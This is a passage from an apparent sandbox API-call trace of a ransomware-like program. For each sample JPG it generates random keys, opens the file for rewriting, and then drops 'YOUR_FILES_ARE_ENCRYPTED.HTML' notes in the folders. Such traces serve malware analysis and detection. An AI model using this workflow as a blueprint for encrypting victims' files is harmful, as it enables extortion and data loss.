param_1="8E") returned 2 
[0171.663] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="04") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="A0") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="90") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="12") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="7B") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="86") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="8F") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="46") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="5D") returned 2 [0171.664] lstrcpyW (in: lpString1=0x76c8fac, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" [0171.664] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x76b8ef8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.664] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76b8ef8, lpOverlapped=0x76b8ef8) returned 1 [0171.664] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f3de2, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1ce1c42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1ce1c42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xbea1f, dwReserved0=0x0, dwReserved1=0x60, cFileName="Koala.jpg", cAlternateFileName="")) returned 1 [0171.664] wnsprintfW (in: pszDest=0x74fa010, 
cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 54 [0171.664] lstrcmpW (lpString1="Koala.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.664] PathFindExtensionW (pszPath="Koala.jpg") returned=".jpg" [0171.664] lstrlenW (lpString=".jpg") returned 4 [0171.664] PathFindExtensionW (pszPath="Koala.jpg") returned=".jpg" [0171.664] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x604 [0171.665] GetFileSizeEx (in: hFile=0x604, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=780831) returned 1 [0171.665] GetProcessHeap () returned 0x270000 [0171.665] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76e1050 [0171.667] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="DA") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="51") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="F0") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="35") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="49") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="64") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="DE") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="D8") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="3A") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda5a, 
param_2="%02X" | out: param_1="AE") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="4E") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D2") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="54") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="C9") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="C2") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="DE") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="AD") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="4C") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="82") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="A0") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="48") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="14") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="6D") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="0B") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="0E") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="C7") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="45") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="6C") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="9A") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="87") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="20") returned 2 [0171.668] wsprintfW 
(in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="70") returned 2 [0171.669] lstrcpyW (in: lpString1=0x76f1104, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" [0171.669] CreateIoCompletionPort (FileHandle=0x604, ExistingCompletionPort=0x3a0, CompletionKey=0x76e1050, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.669] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76e1050, lpOverlapped=0x76e1050) returned 1 [0171.669] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d07da2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d07da2, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x8907c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Lighthouse.jpg", cAlternateFileName="LIGHTH~1.JPG")) returned 1 [0171.669] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 59 [0171.669] lstrcmpW (lpString1="Lighthouse.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.669] PathFindExtensionW (pszPath="Lighthouse.jpg") returned=".jpg" [0171.669] lstrlenW (lpString=".jpg") returned 4 [0171.669] PathFindExtensionW (pszPath="Lighthouse.jpg") returned=".jpg" [0171.669] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), 
dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0171.671] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=561276) returned 1 [0171.671] GetProcessHeap () returned 0x270000 [0171.671] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x77091a8 [0171.673] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="52") returned 2 [0171.673] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="AF") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="33") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="AB") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="5E") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="E5") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="35") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="F6") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="66") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="7D") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="9E") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="FC") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="95") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="C8") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="95") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="99") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="2C") returned 2 [0171.674] 
wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="59") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="60") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="3A") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="9F") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="5D") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="C5") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="67") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="6D") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="09") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="B0") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="2C") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="6E") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="38") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="1F") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="12") returned 2 [0171.675] lstrcpyW (in: lpString1=0x771925c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" [0171.676] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x77091a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.676] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x77091a8, lpOverlapped=0x77091a8) returned 1 [0171.676] FindNextFileW 
(in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f3de2, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1ce1c42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1ce1c42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xbde6b, dwReserved0=0x0, dwReserved1=0x60, cFileName="Penguins.jpg", cAlternateFileName="")) returned 1 [0171.676] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 57 [0171.676] lstrcmpW (lpString1="Penguins.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.676] PathFindExtensionW (pszPath="Penguins.jpg") returned=".jpg" [0171.676] lstrlenW (lpString=".jpg") returned 4 [0171.676] PathFindExtensionW (pszPath="Penguins.jpg") returned=".jpg" [0171.676] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d8 [0171.677] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=777835) returned 1 [0171.677] GetProcessHeap () returned 0x270000 [0171.677] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x750a450 [0171.681] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="89") returned 2 [0171.681] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="24") returned 2 [0171.681] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="0E") returned 2 [0171.681] wsprintfW (in: 
param_1=0x4ebda42, param_2="%02X" | out: param_1="EF") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="8F") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="03") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="E2") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="6B") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="ED") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="2D") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="A0") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="2C") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="CE") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="C6") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="B5") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="8F") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="29") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="53") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="A6") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="A2") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="1B") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="72") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="1B") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="40") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="C7") returned 2 
[0171.682] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="EF") returned 2 [0171.683] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="B9") returned 2 [0171.683] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="A8") returned 2 [0171.683] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="4F") returned 2 [0171.683] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="67") returned 2 [0171.683] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="CD") returned 2 [0171.683] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="21") returned 2 [0171.683] lstrcpyW (in: lpString1=0x751a504, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" [0171.683] CreateIoCompletionPort (FileHandle=0x5d8, ExistingCompletionPort=0x3a0, CompletionKey=0x750a450, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.683] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x750a450, lpOverlapped=0x750a450) returned 1 [0171.683] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d07da2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d07da2, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x97958, dwReserved0=0x0, dwReserved1=0x60, cFileName="Tulips.jpg", cAlternateFileName="")) returned 1 [0171.683] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned 55 [0171.684] lstrcmpW (lpString1="Tulips.jpg", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.684] PathFindExtensionW (pszPath="Tulips.jpg") returned=".jpg" [0171.684] lstrlenW (lpString=".jpg") returned 4 [0171.684] PathFindExtensionW (pszPath="Tulips.jpg") returned=".jpg" [0171.684] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.684] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5f0 [0171.684] GetFileSizeEx (in: hFile=0x5f0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=620888) returned 1 [0171.684] GetProcessHeap () returned 0x270000 [0171.684] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75325a8 [0171.686] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="79") returned 2 [0171.686] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="98") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="BE") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="5A") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="C3") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="D5") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="03") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="0D") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="4C") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="DA") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="6E") returned 2 [0171.687] wsprintfW (in: 
param_1=0x4ebda62, param_2="%02X" | out: param_1="04") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="EF") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="4E") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="DC") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="32") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="FF") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="2D") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="E7") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="5F") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="5D") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="F1") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="62") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="86") returned 2 [0171.688] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="E8") returned 2 [0171.688] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="A4") returned 2 [0171.688] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="64") returned 2 [0171.688] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="75") returned 2 [0171.688] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="B0") returned 2 [0171.688] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="0C") returned 2 [0171.688] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="D3") returned 2 [0171.688] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="2B") returned 2 [0171.688] lstrcpyW (in: lpString1=0x754265c, 
lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" [0171.688] CreateIoCompletionPort (FileHandle=0x5f0, ExistingCompletionPort=0x3a0, CompletionKey=0x75325a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.688] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75325a8, lpOverlapped=0x75325a8) returned 1 [0171.689] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d07da2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d07da2, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x97958, dwReserved0=0x0, dwReserved1=0x60, cFileName="Tulips.jpg", cAlternateFileName="")) returned 0 [0171.689] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.689] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0171.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\pictures\\sample pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.839] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.841] CloseHandle (hObject=0x5f8) returned 
1 [0171.841] GetProcessHeap () returned 0x270000 [0171.842] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.842] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3d7eb8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 0 [0171.843] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.843] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 58 [0171.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.843] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.845] CloseHandle (hObject=0x5a0) returned 1 [0171.845] GetProcessHeap () returned 0x270000 [0171.846] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0171.846] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, 
